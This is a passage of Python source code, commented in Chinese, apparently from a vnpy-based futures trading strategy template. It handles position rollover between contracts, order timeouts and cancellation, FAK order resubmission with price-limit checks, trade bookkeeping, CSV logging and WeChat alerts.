self.write_log(u'{}加载持久化数据完成,多单:{},空单:{},共:{}手'
.format(self.strategy_name,
self.position.long_pos,
abs(self.position.short_pos),
self.position.pos))
self.pos = self.position.pos
self.gt.save()
self.display_grids()
#if not self.backtesting:
if len(self.vt_symbol) > 0 and self.vt_symbol not in pos_symbols:
pos_symbols.add(self.vt_symbol)
if self.idx_symbol and self.idx_symbol not in pos_symbols:
pos_symbols.add(self.idx_symbol)
# 如果持仓的合约,不在self.vt_symbol中,需要订阅
for symbol in list(pos_symbols):
self.write_log(f'新增订阅合约:{symbol}')
self.cta_engine.subscribe_symbol(strategy_name=self.strategy_name, vt_symbol=symbol)
def get_positions(self):
"""
获取策略当前持仓(重构,使用主力合约)
:return: [{'vt_symbol':symbol,'direction':direction,'volume':volume]
"""
if not self.position:
return []
pos_list = []
if self.position.long_pos > 0:
for g in self.gt.get_opened_grids(direction=Direction.LONG):
vt_symbol = g.snapshot.get('mi_symbol', g.vt_symbol if g.vt_symbol and '99' not in g.vt_symbol else self.vt_symbol)
open_price = g.snapshot.get('open_price', g.open_price)
pos_list.append({'vt_symbol': vt_symbol,
'direction': 'long',
'volume': g.volume - g.traded_volume,
'price': open_price})
if abs(self.position.short_pos) > 0:
for g in self.gt.get_opened_grids(direction=Direction.SHORT):
vt_symbol = g.snapshot.get('mi_symbol', g.vt_symbol if g.vt_symbol and '99' not in g.vt_symbol else self.vt_symbol)
open_price = g.snapshot.get('open_price', g.open_price)
pos_list.append({'vt_symbol': vt_symbol,
'direction': 'short',
'volume': abs(g.volume - g.traded_volume),
'price': open_price})
if self.cur_datetime and (datetime.now() - self.cur_datetime).total_seconds() < 10:
self.write_log(u'当前持仓:{}'.format(pos_list))
return pos_list
def get_policy_json(self):
"""获取policy的json格式数据"""
if not self.policy:
return None
data = self.policy.to_json()
return data
def get_grid_trade_json(self):
"""获取gt组件的json格式数据"""
if not self.gt:
return None
data = self.gt.to_json()
return data
def tns_cancel_logic(self, dt, force=False):
"撤单逻辑"""
if len(self.active_orders) < 1:
self.entrust = 0
return
for vt_orderid in list(self.active_orders.keys()):
order_info = self.active_orders.get(vt_orderid)
order_grid = order_info.get('grid',None)
if order_info.get('status', None) in [Status.CANCELLED, Status.REJECTED]:
self.active_orders.pop(vt_orderid, None)
continue
order_time = order_info.get('order_time')
over_ms = (dt - order_time).total_seconds()
# 白天开盘或许有指数与真实tick的时间延迟,这个时刻不做撤单功能
if f'{dt.hour}:{dt.minute}' in ['10:30', '13:30']:
continue
if (over_ms > self.cancel_seconds) \
or force: # 超过设置的时间还未成交
self.write_log(f'{dt}, 超时{over_ms}秒未成交,取消委托单:{order_info}')
if self.cancel_order(vt_orderid):
order_info.update({'status': Status.CANCELLING})
else:
order_info.update({'status': Status.CANCELLED})
if order_grid:
if vt_orderid in order_grid.order_ids:
order_grid.order_ids.remove(vt_orderid)
if len(order_grid.order_ids) == 0:
order_grid.order_status = False
if len(self.active_orders) < 1:
self.entrust = 0
def tns_switch_long_pos(self, open_new=True):
"""
切换合约,从持仓的非主力合约,切换至主力合约
:param open_new: 是否开仓主力合约
:return:
"""
if self.entrust != 0:
return
if self.position.long_pos == 0:
return
if self.cur_mi_price == 0:
return
none_mi_grid = None
none_mi_symbol = None
self.write_log(f'持仓换月=>启动.')
# 找出非主力合约的持仓网格
for g in self.gt.get_opened_grids(direction=Direction.LONG):
none_mi_symbol = g.snapshot.get('mi_symbol', g.vt_symbol)
# 如果持仓的合约,跟策略配置的vt_symbol一致,则不处理
if none_mi_symbol is None or none_mi_symbol == self.vt_symbol:
self.write_log(f'none_mi_symbol:{none_mi_symbol}, vt_symbol:{self.vt_symbol} 一致,不处理')
continue
# 如果未开仓,或者处于委托状态,或者已交易完毕,不处理
if not g.open_status or g.order_status or g.volume - g.traded_volume <= 0:
self.write_log(f'开仓状态:{g.open_status}, 委托状态:{g.order_status},网格持仓:{g.volume} ,已交易数量:{g.traded_volume}, 不处理')
continue
none_mi_grid = g
if g.traded_volume > 0 and g.volume - g.traded_volume > 0:
g.volume -= g.traded_volume
g.traded_volume = 0
break
if none_mi_grid is None:
return
self.write_log(f'持仓换月=>找到多单持仓:{none_mi_symbol},持仓数量:{none_mi_grid.volume}')
# 找到行情中非主力合约/主力合约的最新价
none_mi_tick = self.tick_dict.get(none_mi_symbol)
mi_tick = self.tick_dict.get(self.vt_symbol, None)
if none_mi_tick is None or mi_tick is None:
return
# 如果涨停价,不做卖出
if self.is_upper_limit(none_mi_symbol) or self.is_upper_limit(self.vt_symbol):
self.write_log(f'{none_mi_symbol} 或 {self.vt_symbol} 为涨停价,不做换仓')
return
none_mi_price = max(none_mi_tick.last_price, none_mi_tick.bid_price_1)
grid = deepcopy(none_mi_grid)
grid.id = str(uuid.uuid1())
grid.open_status = False
self.write_log(f'持仓换月=>复制持仓信息{none_mi_symbol},ID:{none_mi_grid.id} => {self.vt_symbol},ID:{grid.id}')
# 委托卖出非主力合约
vt_orderids = self.sell(price=none_mi_price,
volume=none_mi_grid.volume,
vt_symbol=none_mi_symbol,
order_type=self.order_type,
grid=none_mi_grid)
if len(vt_orderids) > 0:
self.write_log(f'持仓换月=>委托卖出非主力合约{none_mi_symbol}持仓:{none_mi_grid.volume}')
# 已经发生过换月的,不执行买入新合约
if none_mi_grid.snapshot.get("switched", False):
self.write_log(f'持仓换月=>已经执行过换月,不再创建新的买入操作')
return
none_mi_grid.snapshot.update({'switched': True})
# 如果不买入新主力合约,直接返回
            # 某些策略会自动重新开仓的
if not open_new:
self.write_log(f'不买入新的主力合约:{self.vt_symbol},数量:{grid.volume}')
self.gt.save()
return
# 添加买入主力合约
grid.snapshot.update({'mi_symbol': self.vt_symbol, 'open_price': self.cur_mi_price})
self.gt.dn_grids.append(grid)
vt_orderids = self.buy(price=self.cur_mi_price + 5 * self.price_tick,
volume=grid.volume,
vt_symbol=self.vt_symbol,
order_type=self.order_type,
grid=grid)
if len(vt_orderids) > 0:
self.write_log(u'持仓换月=>委托买入主力合约:{},价格:{},数量:{}'
.format(self.vt_symbol, self.cur_mi_price, grid.volume))
else:
self.write_error(f'持仓换月=>委托买入主力合约:{self.vt_symbol}失败')
self.gt.save()
else:
self.write_error(f'持仓换月=>委托卖出非主力合约:{none_mi_symbol}失败')
def tns_switch_short_pos(self,open_new=True):
"""
切换合约,从持仓的非主力合约,切换至主力合约
:param open_new: 是否开仓新得主力合约
:return:
"""
if self.entrust != 0:
return
if self.position.short_pos == 0:
return
if self.cur_mi_price == 0:
return
none_mi_grid = None
none_mi_symbol = None
# 找出非主力合约的持仓网格
for g in self.gt.get_opened_grids(direction=Direction.SHORT):
none_mi_symbol = g.snapshot.get('mi_symbol')
if none_mi_symbol is None or none_mi_symbol == self.vt_symbol:
continue
if not g.open_status or g.order_status or g.volume - g.traded_volume <= 0:
continue
none_mi_grid = g
if g.traded_volume > 0 and g.volume - g.traded_volume > 0:
g.volume -= g.traded_volume
g.traded_volume = 0
break
# 找不到与主力合约不一致的持仓网格
if none_mi_grid is None:
return
# 找到行情中非主力合约的最新价
none_mi_tick = self.tick_dict.get(none_mi_symbol)
mi_tick = self.tick_dict.get(self.vt_symbol, None)
if none_mi_tick is None or mi_tick is None:
return
# 如果跌停价,不做cover
if self.is_lower_limit(none_mi_symbol) or self.is_lower_limit(self.vt_symbol):
return
none_mi_price = max(none_mi_tick.last_price, none_mi_tick.bid_price_1)
grid = deepcopy(none_mi_grid)
grid.id = str(uuid.uuid1())
# 委托平空非主力合约
vt_orderids = self.cover(price=none_mi_price,
volume=none_mi_grid.volume,
vt_symbol=none_mi_symbol,
order_type=self.order_type,
grid=none_mi_grid)
if len(vt_orderids) > 0:
self.write_log(f'委托平空非主力合约{none_mi_symbol}持仓:{none_mi_grid.volume}')
# 已经发生过换月的,不执行开空新合约
if none_mi_grid.snapshot.get("switched", False):
self.write_log(f'已经执行过换月,不再创建新的空操作')
return
none_mi_grid.snapshot.update({'switched': True})
# 如果不开空新主力合约,直接返回
            # 某些策略会自动重新开仓的
if not open_new:
self.write_log(f'不开空新的主力合约:{self.vt_symbol},数量:{grid.volume}')
self.gt.save()
return
# 添加卖出主力合约
grid.id = str(uuid.uuid1())
grid.snapshot.update({'mi_symbol': self.vt_symbol, 'open_price': self.cur_mi_price})
self.gt.up_grids.append(grid)
vt_orderids = self.short(price=self.cur_mi_price,
volume=grid.volume,
vt_symbol=self.vt_symbol,
order_type=self.order_type,
grid=grid)
if len(vt_orderids) > 0:
self.write_log(f'委托做空主力合约:{self.vt_symbol},价格:{self.cur_mi_price},数量:{grid.volume}')
else:
self.write_error(f'委托做空主力合约:{self.vt_symbol}失败')
self.gt.save()
else:
self.write_error(f'委托平空非主力合约:{none_mi_symbol}失败')
def display_grids(self):
"""更新网格显示信息"""
if not self.inited:
return
up_grids_info = self.gt.to_str(direction=Direction.SHORT)
if len(self.gt.up_grids) > 0:
self.write_log(up_grids_info)
dn_grids_info = self.gt.to_str(direction=Direction.LONG)
if len(self.gt.dn_grids) > 0:
self.write_log(dn_grids_info)
def display_tns(self):
"""显示事务的过程记录=》 log"""
if not self.inited:
return
self.write_log(u'{} 当前指数{}价格:{},当前主力{}价格:{}'
.format(self.cur_datetime,
self.idx_symbol, self.cur_99_price,
self.vt_symbol, self.cur_mi_price))
if hasattr(self, 'policy'):
policy = getattr(self, 'policy')
op = getattr(policy, 'to_json', None)
if callable(op):
self.write_log(u'当前Policy:{}'.format(policy.to_json()))
def save_dist(self, dist_data):
"""
保存策略逻辑过程记录=》 csv文件按
:param dist_data:
:return:
"""
if self.backtesting:
save_path = self.cta_engine.get_logs_path()
else:
save_path = self.cta_engine.get_data_path()
try:
if self.position and 'long_pos' not in dist_data:
dist_data.update({'long_pos': self.position.long_pos})
if self.position and 'short_pos' not in dist_data:
dist_data.update({'short_pos': self.position.short_pos})
file_name = os.path.abspath(os.path.join(save_path, f'{self.strategy_name}_dist.csv'))
append_data(file_name=file_name, dict_data=dist_data, field_names=self.dist_fieldnames)
except Exception as ex:
self.write_error(u'save_dist 异常:{} {}'.format(str(ex), traceback.format_exc()))
def save_tns(self, tns_data):
"""
保存多空事务记录=》csv文件,便于后续分析
:param tns_data: {"datetime":xxx, "direction":"long"或者"short", "price":xxx}
:return:
"""
if self.backtesting:
save_path = self.cta_engine.get_logs_path()
else:
save_path = self.cta_engine.get_data_path()
try:
file_name = os.path.abspath(os.path.join(save_path, f'{self.strategy_name}_tns.csv'))
append_data(file_name=file_name, dict_data=tns_data)
except Exception as ex:
self.write_error(u'save_tns 异常:{} {}'.format(str(ex), traceback.format_exc()))
def send_wechat(self, msg: str):
"""实盘时才发送微信"""
if self.backtesting:
return
self.cta_engine.send_wechat(msg=msg, strategy=self)
class CtaProFutureTemplate(CtaProTemplate):
"""期货交易增强版模板"""
activate_fak = False
activate_today_lock = False
def __init__(self, cta_engine, strategy_name, vt_symbol, setting):
""""""
super().__init__(cta_engine, strategy_name, vt_symbol, setting)
self.parameters.append('activate_fak')
self.parameters.append('activate_today_lock')
def update_setting(self, setting: dict):
"""更新配置参数"""
super().update_setting(setting)
# 实盘时,判断是否激活使用FAK模式
if not self.backtesting:
if self.activate_fak:
self.order_type = OrderType.FAK
def load_policy(self):
"""加载policy"""
if self.policy:
self.write_log(u'load_policy(),初始化Policy')
self.policy.load()
self.write_log(u'Policy:{}'.format(self.policy.to_json()))
def on_start(self):
"""启动策略(必须由用户继承实现)"""
self.write_log(u'启动')
self.trading = True
self.put_event()
def on_stop(self):
"""停止策略(必须由用户继承实现)"""
self.active_orders.clear()
self.pos = 0
self.entrust = 0
self.write_log(u'停止')
self.put_event()
def on_trade(self, trade: TradeData):
"""
交易更新
支持股指期货的对锁单或者解锁
:param trade:
:return:
"""
self.write_log(u'{},交易更新 =>{},\n 当前持仓:{} '
.format(self.cur_datetime,
trade.__dict__,
self.position.pos))
dist_record = dict()
if self.backtesting:
dist_record['datetime'] = trade.time
else:
dist_record['datetime'] = ' '.join([self.cur_datetime.strftime('%Y-%m-%d'), trade.time])
dist_record['volume'] = trade.volume
dist_record['price'] = trade.price
dist_record['symbol'] = trade.vt_symbol
# 处理股指锁单
if trade.exchange == Exchange.CFFEX and not self.backtesting:
if trade.direction == Direction.LONG:
if abs(self.position.short_pos) >= trade.volume:
self.position.short_pos += trade.volume
else:
self.position.long_pos += trade.volume
else:
if self.position.long_pos >= trade.volume:
self.position.long_pos -= trade.volume
else:
self.position.short_pos -= trade.volume
self.position.pos = self.position.long_pos + self.position.short_pos
dist_record['long_pos'] = self.position.long_pos
dist_record['short_pos'] = self.position.short_pos
else:
if trade.direction == Direction.LONG and trade.offset == Offset.OPEN:
dist_record['operation'] = 'buy'
self.position.open_pos(trade.direction, volume=trade.volume)
dist_record['long_pos'] = self.position.long_pos
dist_record['short_pos'] = self.position.short_pos
if trade.direction == Direction.SHORT and trade.offset == Offset.OPEN:
dist_record['operation'] = 'short'
self.position.open_pos(trade.direction, volume=trade.volume)
dist_record['long_pos'] = self.position.long_pos
dist_record['short_pos'] = self.position.short_pos
if trade.direction == Direction.LONG and trade.offset != Offset.OPEN:
dist_record['operation'] = 'cover'
self.position.close_pos(trade.direction, volume=trade.volume)
dist_record['long_pos'] = self.position.long_pos
dist_record['short_pos'] = self.position.short_pos
if trade.direction == Direction.SHORT and trade.offset != Offset.OPEN:
dist_record['operation'] = 'sell'
self.position.close_pos(trade.direction, volume=trade.volume)
dist_record['long_pos'] = self.position.long_pos
dist_record['short_pos'] = self.position.short_pos
self.save_dist(dist_record)
self.pos = self.position.pos
def fix_order(self, order: OrderData):
"""修正order被拆单得情况"""
order_info = self.active_orders.get(order.vt_orderid, None)
if order_info:
volume = order_info.get('volume')
if volume != order.volume:
                self.write_log(f'修正order被拆单的情况,调整{order.vt_orderid} volume:{volume}=>{order.volume}')
order_info.update({'volume': order.volume})
def on_order(self, order: OrderData):
"""报单更新"""
# 未执行的订单中,存在是异常,删除
self.write_log(u'{}报单更新 => {}'.format(self.cur_datetime, order.__dict__))
# 修正order被拆单得情况"
self.fix_order(order)
if order.vt_orderid in self.active_orders:
active_order = self.active_orders[order.vt_orderid]
if order.volume == order.traded and order.status in [Status.ALLTRADED]:
self.on_order_all_traded(order)
#elif order.offset == Offset.OPEN and order.status in [Status.CANCELLED]:
# 这里 换成active_order的,因为原始order有可能被换成锁仓方式
elif active_order['offset'] == Offset.OPEN and order.status in [Status.CANCELLED]:
# 开仓委托单被撤销
self.on_order_open_canceled(order)
#elif order.offset != Offset.OPEN and order.status in [Status.CANCELLED]:
# # 这里 换成active_order的,因为原始order有可能被换成锁仓方式
elif active_order['offset'] != Offset.OPEN and order.status in [Status.CANCELLED]:
# 平仓委托单被撤销
self.on_order_close_canceled(order)
elif order.status == Status.REJECTED:
if active_order['offset'] == Offset.OPEN:
self.write_error(u'{}委托单开{}被拒,price:{},total:{},traded:{},status:{}'
.format(order.vt_symbol, order.direction, order.price, order.volume,
order.traded, order.status))
self.on_order_open_canceled(order)
else:
self.write_error(u'OnOrder({})委托单平{}被拒,price:{},total:{},traded:{},status:{}'
.format(order.vt_symbol, order.direction, order.price, order.volume,
order.traded, order.status))
self.on_order_close_canceled(order)
else:
self.write_log(u'委托单未完成,total:{},traded:{},tradeStatus:{}'
.format(order.volume, order.traded, order.status))
else:
self.write_error(u'委托单{}不在策略的未完成订单列表中:{}'.format(order.vt_orderid, self.active_orders))
def on_order_all_traded(self, order: OrderData):
"""
订单全部成交
:param order:
:return:
"""
self.write_log(u'报单更新 => 委托单全部完成:{}'.format(order.__dict__))
active_order = self.active_orders[order.vt_orderid]
# 通过vt_orderid,找到对应的网格
grid = active_order.get('grid', None)
if grid is not None:
# 移除当前委托单
if order.vt_orderid in grid.order_ids:
grid.order_ids.remove(order.vt_orderid)
# 网格的所有委托单已经执行完毕
if len(grid.order_ids) == 0:
grid.order_status = False
grid.traded_volume = 0
# 平仓完毕(cover, sell)
if active_order['offset'] != Offset.OPEN:
grid.open_status = False
grid.close_status = True
grid.open_time = None
self.write_log(f'{grid.direction.value}单已平仓完毕,order_price:{order.price}'
+ f',volume:{order.volume}')
self.write_log(f'移除网格:{grid.to_json()}')
self.gt.remove_grids_by_ids(direction=grid.direction, ids=[grid.id])
# 开仓完毕( buy, short)
else:
grid.open_status = True
grid.open_time = self.cur_datetime
self.write_log(f'{grid.direction.value}单已开仓完毕,order_price:{order.price}'
+ f',volume:{order.volume}')
# 网格的所有委托单部分执行完毕
else:
old_traded_volume = grid.traded_volume
grid.traded_volume += order.volume
self.write_log(f'{grid.direction.value}单部分{order.offset}仓,'
+ f'网格volume:{grid.volume}, traded_volume:{old_traded_volume}=>{grid.traded_volume}')
self.write_log(f'剩余委托单号:{grid.order_ids}')
self.gt.save()
else:
self.write_error(f'on_trade找不到对应grid')
# 在策略得活动订单中,移除
self.active_orders.pop(order.vt_orderid, None)
def on_order_open_canceled(self, order: OrderData):
"""
委托开仓单撤销
如果是FAK模式,重新修改价格,再提交
FAK用于实盘,需要增加涨跌停判断
:param order:
:return:
"""
self.write_log(u'报单更新 => 委托开仓 => 撤销:{}'.format(order.__dict__))
if not self.trading:
if not self.backtesting:
self.write_error(u'当前不允许交易')
return
if order.vt_orderid not in self.active_orders:
self.write_error(u'{}不在未完成的委托单中{}。'.format(order.vt_orderid, self.active_orders))
return
# 直接更新“未完成委托单”,更新volume,retry次数
old_order = self.active_orders[order.vt_orderid]
self.write_log(u'报单更新 => {} 未完成订单信息:{}'.format(order.vt_orderid, old_order))
old_order['traded'] = order.traded
order_vt_symbol = copy(old_order['vt_symbol'])
order_volume = old_order['volume'] - old_order['traded']
order_price = old_order['price']
order_type = old_order.get('order_type', OrderType.LIMIT)
order_retry = old_order.get('retry', 0)
grid = old_order.get('grid', None)
if grid:
if order.vt_orderid in grid.order_ids:
grid.order_ids.remove(order.vt_orderid)
if order_volume <= 0:
msg = u'{} {}{}需重新开仓数量为{},不再开仓' \
.format(self.strategy_name,
order.vt_orderid,
order_vt_symbol,
order_volume)
self.write_error(msg)
self.write_log(u'移除:{}'.format(order.vt_orderid))
self.active_orders.pop(order.vt_orderid, None)
return
if order_retry > 20:
# 这里超过20次尝试失败后,不再尝试,发出告警信息
msg = u'{} {}/{}手, 重试开仓次数{}>20' \
.format(self.strategy_name,
order_vt_symbol,
order_volume,
order_retry)
self.write_error(msg)
self.send_wechat(msg)
# 网格的所有委托单已经执行完毕
if len(grid.order_ids) == 0:
grid.order_status = False
self.gt.save()
self.write_log(u'网格信息更新:{}'.format(grid.__dict__))
self.write_log(u'移除:{}'.format(order.vt_orderid))
self.active_orders.pop(order.vt_orderid, None)
return
order_retry += 1
# FAK 重新开单
if old_order['direction'] == Direction.LONG and order_type == OrderType.FAK:
# 删除旧的委托记录
self.write_log(u'移除旧的委托记录:{}'.format(order.vt_orderid))
self.active_orders.pop(order.vt_orderid, None)
if order.traded > 0:
old_traded_volume = grid.traded_volume
grid.traded_volume += order.traded
self.write_log(f'{grid.direction.value}单部分{order.offset}仓,'
+ f'网格volume:{grid.volume}, traded_volume:{old_traded_volume}=>{grid.traded_volume}')
# 更新网格交易器
self.write_log(u'FAK模式,需要重新发送buy委托.grid:{}'.format(grid.__dict__))
# 更新委托平仓价
buy_price = max(self.cur_mi_tick.ask_price_1, self.cur_mi_tick.last_price, order_price) + self.price_tick
# 不能超过涨停价
if self.cur_mi_tick.limit_up > 0 and buy_price > self.cur_mi_tick.limit_up:
buy_price = self.cur_mi_tick.limit_up
if self.is_upper_limit(self.vt_symbol):
self.write_log(u'{}涨停,不做buy'.format(self.vt_symbol))
return
# 发送委托
vt_orderids = self.buy(price=buy_price,
volume=order_volume,
vt_symbol=self.vt_symbol,
order_type=OrderType.FAK,
order_time=self.cur_datetime,
grid=grid)
if not vt_orderids:
self.write_error(u'重新提交{} {}手开多单,价格:{},失败'.
format(self.vt_symbol, order_volume, buy_price))
return
# 更新retry的次数
for vt_orderid in vt_orderids:
info = self.active_orders.get(vt_orderid, None)
info.update({'retry': order_retry})
self.gt.save()
elif old_order['direction'] == Direction.SHORT and order_type == OrderType.FAK:
# 删除旧的委托记录
self.write_log(u'移除旧的委托记录:{}'.format(order.vt_orderid))
self.active_orders.pop(order.vt_orderid, None)
if order.traded > 0:
old_traded_volume = grid.traded_volume
grid.traded_volume += order.traded
self.write_log(f'{grid.direction.value}单部分{order.offset}仓,'
+ f'网格volume:{grid.volume}, traded_volume:{old_traded_volume}=>{grid.traded_volume}')
self.write_log(u'FAK模式,需要重新发送short委托.grid:{}'.format(grid.__dict__))
short_price = min(self.cur_mi_tick.bid_price_1, self.cur_mi_tick.last_price, order_price) - self.price_tick
# 不能超过跌停价
if self.cur_mi_tick.limit_down > 0 and short_price < self.cur_mi_tick.limit_down:
short_price = self.cur_mi_tick.limit_down
if self.is_lower_limit(self.vt_symbol):
self.write_log(u'{}跌停,不做short'.format(self.vt_symbol))
return
# 发送委托
vt_orderids = self.short(price=short_price,
volume=order_volume,
vt_symbol=self.vt_symbol,
order_type=OrderType.FAK,
order_time=self.cur_datetime,
grid=grid)
if not vt_orderids:
self.write_error(
u'重新提交{} {}手开空单,价格:{}, 失败'.format(self.vt_symbol, order_volume, short_price))
return
# 更新retry的次数
for vt_orderid in vt_orderids:
info = self.active_orders.get(vt_orderid, None)
info.update({'retry': order_retry})
self.gt.save()
else:
pre_status = old_order.get('status', Status.NOTTRADED)
old_order.update({'status': Status.CANCELLED})
self.write_log(u'委托单方式{},状态:{}=>{}'.format(order_type, pre_status, old_order.get('status')))
if grid:
if order.vt_orderid in grid.order_ids:
grid.order_ids.remove(order.vt_orderid)
if not grid.order_ids:
grid.order_status = False
self.gt.save()
self.active_orders.update({order.vt_orderid: old_order})
self.display_grids()
def on_order_close_canceled(self, order: OrderData):
"""委托平仓单撤销"""
self.write_log(u'报单更新 => 委托平仓 => 撤销:{}'.format(order.__dict__))
if order.vt_orderid not in self.active_orders:
self.write_error(u'{}不在未完成的委托单中:{}。'.format(order.vt_orderid, self.active_orders))
return
if not self.trading:
self.write_error(u'当前不允许交易')
return
# 直接更新“未完成委托单”,更新volume,Retry次数
old_order = self.active_orders[order.vt_orderid]
self.write_log(u'报单更新 => {} 未完成订单信息:{}'.format(order.vt_orderid, old_order))
old_order['traded'] = order.traded
# order_time = old_order['order_time']
order_vt_symbol = copy(old_order['vt_symbol'])
order_volume = old_order['volume'] - old_order['traded']
order_price = old_order['price']
order_type = old_order.get('order_type', OrderType.LIMIT)
order_retry = old_order.get('retry', 0)
grid = old_order.get('grid', None)
if grid:
if order.vt_orderid in grid.order_ids:
grid.order_ids.remove(order.vt_orderid)
if order_volume <= 0:
msg = u'{} {}{}重新平仓数量为{},不再平仓' \
.format(self.strategy_name, order.vt_orderid, order_vt_symbol, order_volume)
self.write_error(msg)
self.send_wechat(msg)
self.write_log(u'活动订单移除:{}'.format(order.vt_orderid))
self.active_orders.pop(order.vt_orderid, None)
return
if order_retry > 20:
msg = u'{} 平仓撤单 {}/{}手, 重试平仓次数{}>20' \
.format(self.strategy_name, order_vt_symbol, order_volume, order_retry)
self.write_error(msg)
self.send_wechat(msg)
if not grid.order_ids:
grid.order_status = False
self.gt.save()
self.write_log(u'更新网格=>{}'.format(grid.__dict__))
self.write_log(u'移除活动订单:{}'.format(order.vt_orderid))
self.active_orders.pop(order.vt_orderid, None)
return
order_retry += 1
if old_order['direction'] == Direction.LONG and order_type == OrderType.FAK:
self.write_log(u'移除活动订单:{}'.format(order.vt_orderid))
self.active_orders.pop(order.vt_orderid, None)
if order.traded > 0:
old_traded_volume = grid.traded_volume
grid.traded_volume += order.traded
self.write_log(f'{grid.direction.value}单部分{order.offset}仓,'
+ f'网格volume:{grid.volume}, traded_volume:{old_traded_volume}=>{grid.traded_volume}')
self.write_log(u'FAK模式,需要重新发送cover委托.grid:{}'.format(grid.__dict__))
# 更新委托平仓价
cover_tick = self.tick_dict.get(order_vt_symbol, self.cur_mi_tick)
cover_price = max(cover_tick.ask_price_1, cover_tick.last_price, order_price) + self.price_tick
# 不能超过涨停价
if cover_tick.limit_up > 0 and cover_price > cover_tick.limit_up:
cover_price = cover_tick.limit_up
if self.is_upper_limit(order_vt_symbol):
self.write_log(u'{}涨停,不做cover'.format(order_vt_symbol))
return
pos = self.cta_engine.get_position_holding(vt_symbol=order_vt_symbol)
if pos is None:
self.write_error(f'{self.strategy_name}无法获取{order_vt_symbol}的持仓信息,无法平仓')
return
if pos.short_pos < order_volume:
self.write_error(f'{self.strategy_name}{order_vt_symbol}的持仓空单{pos.short_pos}不满足平仓{order_volume}要求,无法平仓')
return
# 发送委托
vt_orderids = self.cover(price=cover_price,
volume=order_volume,
vt_symbol=order_vt_symbol,
order_type=OrderType.FAK,
order_time=self.cur_datetime,
grid=grid)
if not vt_orderids:
self.write_error(u'重新提交{} {}手平空单{}失败'.format(order_vt_symbol, order_volume, cover_price))
return
for vt_orderid in vt_orderids:
info = self.active_orders.get(vt_orderid)
info.update({'retry': order_retry})
self.gt.save()
elif old_order['direction'] == Direction.SHORT and order_type == OrderType.FAK:
self.write_log(u'移除活动订单:{}'.format(order.vt_orderid))
self.active_orders.pop(order.vt_orderid, None)
if order.traded > 0:
old_traded_volume = grid.traded_volume
grid.traded_volume += order.traded
self.write_log(f'{grid.direction.value}单部分{order.offset}仓,'
+ f'网格volume:{grid.volume}, traded_volume:{old_traded_volume}=>{grid.traded_volume}')
self.write_log(u'FAK模式,需要重新发送sell委托.grid:{}'.format(grid.__dict__))
sell_tick = self.tick_dict.get(order_vt_symbol, self.cur_mi_tick)
sell_price = min(sell_tick.bid_price_1, sell_tick.last_price, order_price) - self.price_tick
# 不能超过跌停价
if sell_tick.limit_down > 0 and sell_price < sell_tick.limit_down:
sell_price = sell_tick.limit_down
if self.is_lower_limit(order_vt_symbol):
                self.write_log(u'{}跌停,不做sell'.format(order_vt_symbol))
return
pos = self.cta_engine.get_position_holding(vt_symbol=order_vt_symbol)
if pos is None:
self.write_error(f'{self.strategy_name}无法获取{order_vt_symbol}的持仓信息,无法平仓')
return
if pos.long_pos < order_volume:
self.write_error(f'{self.strategy_name}{order_vt_symbol}的持仓多单{pos.long_pos}不满足平仓{order_volume}要求,无法平仓')
return
# 发送委托
vt_orderids = self.sell(price=sell_price,
volume=order_volume,
vt_symbol=order_vt_symbol,
order_type=OrderType.FAK,
order_time=self.cur_datetime,
grid=grid)
if not vt_orderids:
self.write_error(u'重新提交{} {}手平多单{}失败'.format(order_vt_symbol, order_volume, sell_price))
return
for vt_orderid in vt_orderids:
info = self.active_orders.get(vt_orderid)
info.update({'retry': order_retry})
self.gt.save()
# 普通限价单委托方式
else:
pre_status = old_order.get('status', Status.NOTTRADED)
old_order.update({'status': Status.CANCELLED})
self.write_log(u'委托单状态:{}=>{}'.format(pre_status, old_order.get('status')))
if grid:
# 判断是否有部分交易
if order.traded > 0:
old_traded_volume = grid.traded_volume
grid.traded_volume += order.traded
self.write_log(f'{grid.direction.value}单部分{order.offset}仓,'
+ f'网格volume:{grid.volume}, traded_volume:{old_traded_volume}=>{grid.traded_volume}')
if order.vt_orderid in grid.order_ids:
grid.order_ids.remove(order.vt_orderid)
if len(grid.order_ids) == 0:
grid.order_status = False
self.gt.save()
self.active_orders.update({order.vt_orderid: old_order})
self.display_grids()
def on_stop_order(self, stop_order: StopOrder):
"""
        Stop-order update.
        Override in subclasses to handle the various trigger / cancel cases.
"""
self.write_log(f'停止单触发:{stop_order.__dict__}')
def cancel_all_orders(self):
"""
        Overridden: cancel all outstanding (active) orders.
:return:
"""
self.write_log(u'撤销所有正在进行得委托')
self.tns_cancel_logic(dt=datetime.now(), force=True, reopen=False)
def tns_cancel_logic(self, dt, force=False, reopen=False):
"撤单逻辑"""
if len(self.active_orders) < 1:
self.entrust = 0
return
canceled_ids = []
for vt_orderid in list(self.active_orders.keys()):
order_info = self.active_orders[vt_orderid]
order_vt_symbol = order_info.get('vt_symbol', self.vt_symbol)
order_time = order_info['order_time']
order_volume = order_info['volume'] - order_info['traded']
# order_price = order_info['price']
# order_direction = order_info['direction']
# order_offset = order_info['offset']
order_grid = order_info['grid']
order_status = order_info.get('status', Status.NOTTRADED)
order_type = order_info.get('order_type', OrderType.LIMIT)
over_seconds = (dt - order_time).total_seconds()
# 只处理未成交的限价委托单
if order_status in [Status.NOTTRADED, Status.SUBMITTING] and (
order_type == OrderType.LIMIT or '.SPD' in order_vt_symbol):
if over_seconds > self.cancel_seconds or force: # 超过设置的时间还未成交
self.write_log(u'撤单逻辑 => 超时{}秒未成交,取消委托单:vt_orderid:{},order:{}'
.format(over_seconds, vt_orderid, order_info))
order_info.update({'status': Status.CANCELLING})
self.active_orders.update({vt_orderid: order_info})
ret = self.cancel_order(str(vt_orderid))
if not ret:
self.write_error(f'{self.strategy_name}撤单逻辑 => {order_vt_symbol}撤单失败')
#self.write_log(u'撤单逻辑 => 撤单失败,更新状态为撤单成功')
# order_info.update({'status': Status.CANCELLED})
# self.active_orders.update({vt_orderid: order_info})
# if order_grid:
# if vt_orderid in order_grid.order_ids:
# order_grid.order_ids.remove(vt_orderid)
# if len(order_grid.order_ids) == 0:
# order_grid.order_status = False
continue
# 处理状态为‘撤销’的委托单
elif order_status == Status.CANCELLED:
self.write_log(u'撤单逻辑 => 委托单{}已成功撤单,将删除未完成订单{}'.format(vt_orderid, order_info))
canceled_ids.append(vt_orderid)
if reopen:
# 撤销的委托单,属于开仓类,需要重新委托
if order_info['offset'] == Offset.OPEN:
self.write_log(u'撤单逻辑 => 重新开仓')
# 开空委托单
if order_info['direction'] == Direction.SHORT:
short_price = self.cur_mi_price - self.price_tick
if order_grid.volume != order_volume and order_volume > 0:
self.write_log(
